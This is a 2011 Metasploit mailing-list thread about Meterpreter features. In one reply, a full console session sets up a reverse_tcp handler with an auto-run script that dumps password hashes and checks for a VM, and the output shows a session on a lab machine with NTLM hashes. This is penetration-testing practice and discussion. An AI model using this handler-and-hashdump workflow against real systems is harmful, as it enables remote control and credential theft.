Metasploit mailing list archives
Re: News from Metasploit 4.
From: Richard Miles <richard.k.miles () googlemail com>
Date: Sat, 27 Aug 2011 14:47:32 -0500
Hi Carlos,

It really works very well, big thanks.

I noted that migrate on metasploit4 does not work without the pid. I tried passing the name explorer.exe but it doesn't work. Do you know some workaround?

I found this idea:
http://blog.invisibledenizen.org/2008/12/automatic-migration-to-new-process-with.html

But it executes a new cmd. I don't want to create a new process, I would like to just move to the existing explorer.exe. Do you know any script or trick for this?

Also, when you call screenshot, does your Linux automatically display lynx too? Any way to avoid it?

Thanks and keep up the good work.

On Sat, Aug 27, 2011 at 2:15 PM, Richard Miles <richard.k.miles () googlemail com> wrote:
> Hi Carlos
>
> I followed your step by step and it worked, I'm really a fool.
> Thanks a lot.
>
> By the way do you know if there is reverse_http(s) for windows 64 bits?
>
> Thanks, really thanks.
>
> On Sat, Aug 27, 2011 at 1:50 PM, Carlos Perez <dark0perator () pauldotcom com> wrote:
>> works for me
>>
>> msf > use exploit/multi/handler
>> msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
>> PAYLOAD => windows/meterpreter/reverse_tcp
>> msf exploit(handler) > set LHOST 192.168.1.100
>> LHOST => 192.168.1.100
>> msf exploit(handler) > set AutoRunScript multi_console_command -rc /tmp/sample.rc
>> AutoRunScript => multi_console_command -rc /tmp/sample.rc
>> msf exploit(handler) > set ExitOnSession false
>> ExitOnSession => false
>> msf exploit(handler) > exploit -x -j
>> [*] Exploit running as background job.
>> [*] Started reverse handler on 192.168.1.100:4444
>> [*] Starting the payload handler...
>> msf exploit(handler) > cat /tmp/sample.rc
>> [*] exec: cat /tmp/sample.rc
>>
>> sysinfo
>> getuid
>> load priv
>> hashdump
>> run checkvm
>> msf exploit(handler) > [*] Sending stage (752128 bytes) to 192.168.1.115
>> [*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.115:1543) at 2011-08-27 14:49:29 -0400
>> [*] Session ID 1 (192.168.1.100:4444 -> 192.168.1.115:1543) processing AutoRunScript 'multi_console_command -rc /tmp/sample.rc'
>> [*] Running Command List ...
>> [*] Running command sysinfo
>> Computer : CARLOS-192FCD91
>> OS : Windows XP (Build 2600, Service Pack 3).
>> Architecture : x86
>> System Language : en_US
>> Meterpreter : x86/win32
>> [*] Running command getuid
>> Server username: CARLOS-192FCD91\Administrator
>> [*] Running command load priv
>> [-] The 'priv' extension has already been loaded.
>> [*] Running command hashdump
>> Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
>> Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
>> HelpAssistant:1000:4ce17cdda3f0d92227a09c3d34957704:8fd71d48142454572de5fa172f579392:::
>> HR:1003:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
>> SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:520e865e1977f048b70841950e491b2e:::
>> [*] Running command run checkvm
>> [*] Checking if target is a Virtual Machine .....
>> [*] This is a VMware Virtual Machine
>>
>> On Aug 26, 2011, at 4:16 PM, Richard Miles wrote:
>>> Hi HD Moore,
>>>
>>> Thanks for the links.
>>>
>>> Does the new reverse_http work in 64 bit Windows? How should I call it?
>>>
>>> Any follow-up on the other 2 questions in the e-mail?
>>>
>>> Thanks
>>>
>>> On Fri, Aug 26, 2011 at 9:19 AM, HD Moore <hdm () metasploit com> wrote:
>>>> The Metasploit blog includes quite a bit of information on 4.0:
>>>> https://community.rapid7.com/community/metasploit?view=blog
>>>>
>>>> You can also see the release notes:
>>>> https://community.rapid7.com/docs/DOC-1496

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework